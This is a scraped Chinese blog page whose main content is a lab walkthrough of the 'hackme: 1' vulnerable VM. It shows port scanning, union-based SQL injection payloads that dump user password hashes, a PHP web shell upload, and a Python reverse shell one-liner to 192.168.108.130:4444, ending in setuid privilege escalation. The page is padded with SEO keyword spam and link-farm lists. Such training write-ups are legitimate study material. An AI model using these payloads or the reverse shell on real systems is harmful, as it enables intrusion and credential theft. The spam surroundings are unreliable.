当前位置: 首页 > wzjs >正文

让别人做网站注意事项网站建设资金请示

让别人做网站注意事项,网站建设资金请示,优秀网站设计案例分析ppt,网站首页设计总结目录标题 一、靶机搭建二、信息收集靶机信息扫ip扫开放端口和服务指纹探测目录扫描 三、Web渗透信息收集sql注入判断类型爆数据库名和版本号爆表名爆users表下的列获取users表下的用户和密码 文件上传文件上传反弹shell 四、提权 一、靶机搭建 选择扫描虚拟机 选择路径即可 二…

目录标题

  • 一、靶机搭建
  • 二、信息收集
    • 靶机信息
    • 扫ip
    • 扫开放端口和服务
    • 指纹探测
    • 目录扫描
  • 三、Web渗透
    • 信息收集
    • sql注入
      • 判断类型
      • 爆数据库名和版本号
      • 爆表名
      • 爆users表下的列
      • 获取users表下的用户和密码
    • 文件上传
    • 文件上传反弹shell
  • 四、提权

一、靶机搭建

选择扫描虚拟机

选择路径即可

二、信息收集

靶机信息

Name: hackme: 1
Date release: 18 Jul 2019
难度:初级,目标是通过web漏洞获得有限的权限访问,随后权限以root身份升级。这个实验室是为了模拟现实生活环境而创建的。 
“hackme”使用DHCP,在mysqld可能自行关闭的情况下(非常罕见的情况),尝试强制重启机器,随后它应该可以正常工作。 
hint:本节介绍已收集到的有关该版本的各种信息,例如网页和/或自述文件中的引文。 

扫ip

靶机ip:192.168.108.150

扫开放端口和服务

开放了22和80端口

信息如下:

22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.34 ((Ubuntu))

指纹探测

使用以下命令

nmap 192.168.108.150 -p 22,80 -sV -sC -O --version-all 

信息如下:

运行系统: Linux 3.X|4.X
操作系统CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS 详情: Linux 3.2 - 4.9
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

先看看dirb扫描

试试dirsearch扫描

信息如下:

http://192.168.108.150/uploads        #文件上传
http://192.168.108.150/config.php     #配置信息
http://192.168.108.150/login.php       #登录界面
http://192.168.108.150/logout.php      #登出界面
http://192.168.108.150/register.php    #注册界面

三、Web渗透

信息收集

主页面

由于其他页面无法正常访问,只有一个uploads,也没有什么可以利用的信息

回去注册一个账户并登录

是一个查询界面,查询书名

点击search先看看,看来有数据库,可能是sql注入

抓包看一下,存在注入点

sql注入

判断类型

无回显,看来需要注释符

字符型注入

由于之前search查询出来的结果,该数据库存在三个字段

爆数据库名和版本号

-1' union select version(),database(),3#
数据库:webapphacking

爆表名

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema="webapphacking"#
数据表名称:books,users
  • group_concat():将多行的结果合并到一行
  • information_schema.tables:是一个系统数据库,它存储了所有数据库、表、列等的元数据。在这里,攻击者查询的是tables表,目的是获取所有表的名字。
  • table_schema:指定数据库名称

爆users表下的列

获取users表的列名

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name="users"#
id,user,pasword,name,address

group_concat():将多行的结果合并到一行

select group_concat(column_name),2,3:将结果输出全部在第一字段里,2和3是为了填充查询列,避免出错

获取users表下的用户和密码

-1' union select group_concat(user),group_concat(pasword),3 from users#

这里有很多用户以及他们密码的md5值,我们看比较重要的,superadmin2386acb2cf356944177746fc92523983

查询一下,密码:Uncrackable

文件上传

重新登录

如下,有一个文件上传点,结合之前扫描出来的文件上传页面进行文件上传

访问uploads界面,可以正常上传,且可以访问

上传一个php文件,名为nc.php

track
<?php system($_GET["a"]); ?>

上传成功

执行一下系统命令试试,成功执行

文件上传反弹shell

kali开启监听

利用python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.108.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

反弹成功

四、提权

进入环境先信息收集一波,不过目录是web服务下的,没什么可用信息

进入**/home** 目录查看,发现两个可疑文件夹,hackme和legacy,访问hackme看看

存在两个可疑文件,但不知道怎么利用,进入另一个目录看看,发现一个脚本

  • s:设置用户ID位(setuid),表示当用户执行这个文件时,进程将以文件所有者的权限运行。

ok,直接把提权脚本给我们了,执行该脚本

提权成功


文章转载自:

http://kFJAcYYp.wbysj.cn
http://6sdMkRzz.wbysj.cn
http://4CpjrZDk.wbysj.cn
http://c9VjFSPT.wbysj.cn
http://fSYYMpsh.wbysj.cn
http://EaYGsOnm.wbysj.cn
http://AjJoGVmx.wbysj.cn
http://b4jsHcGQ.wbysj.cn
http://bW9TBNMt.wbysj.cn
http://6P5Q0tBh.wbysj.cn
http://bpuZPHCO.wbysj.cn
http://4E4EZFZr.wbysj.cn
http://H3cnqbSy.wbysj.cn
http://4xZp2YgV.wbysj.cn
http://01ZutUfd.wbysj.cn
http://hiOZcUJt.wbysj.cn
http://osJ8FKik.wbysj.cn
http://LOQsqmXf.wbysj.cn
http://hjEyP3uX.wbysj.cn
http://SfbHOzmC.wbysj.cn
http://zmP7sAlS.wbysj.cn
http://cyTba8Cr.wbysj.cn
http://AsqyGP0R.wbysj.cn
http://k377mL80.wbysj.cn
http://SmBvKPQN.wbysj.cn
http://d8BuXncz.wbysj.cn
http://fdDgiwTU.wbysj.cn
http://9oOj93wo.wbysj.cn
http://Tnw1nCxq.wbysj.cn
http://UUik4J4l.wbysj.cn
http://www.dtcms.com/wzjs/720282.html

相关文章:

  • 许昌做网站公司专业做网站哪家好商城网站开发合同
  • 做网站卖别人的软件可以吗国外被墙网站
  • 企业网页设计网站案例搭建织梦网站视频教程
  • 广州做网站lomuw电影网站建设方案ppt模板
  • 卖老石器老榆木做哪个网站好上海建工网站
  • 做网站开店抖音代运营服务内容及合作套餐
  • 潍坊尚呈网站建设公司专业网站开发价格
  • 哪里建设网站最好wordpress个人网站主题
  • 中国建设网站红黑榜名单山西省财政厅门户网站三基建设
  • wordpress openid新闻类网站怎么做seo
  • 国外化妆品网站模板本地网站开发环境搭建
  • 语文建设编辑部官方网站网站编辑人才队伍建设
  • asp做网站简介页面wordpress 4.7.5
  • 网站建设线框图即时设计是什么软件
  • 建站全过程wordpress 关联
  • 建设股票网站东莞专业做网站公司
  • 橙光音乐一家做音乐的网站wordpress 到小程序
  • 网站模板建站教程html个人网站设计
  • 网站的seo是什么意思怎么制作自己的网页网站
  • 注册一个免费的网站网络营销策划案ppt
  • 中山市两学一做网站中国建设银行信用卡中心网站
  • 翔安区建设局网站谷歌网站推广软件
  • 惠州网站建设兼职农产品电商网站的建设需求
  • 网站焦点图多少钱房地产微网站模板
  • 佛山网站建设专家评价门户网站开发多少钱
  • 网络科技有限公司网站建设网站百度seo推广怎么做
  • 同城购物网站建设成本网站制作 北京
  • 惠安网站建设报价数据中心机房运维方案
  • 基于html5的网站建设论文王也壁纸
  • 河北住建局与建设厅网站北京城乡建设集团网站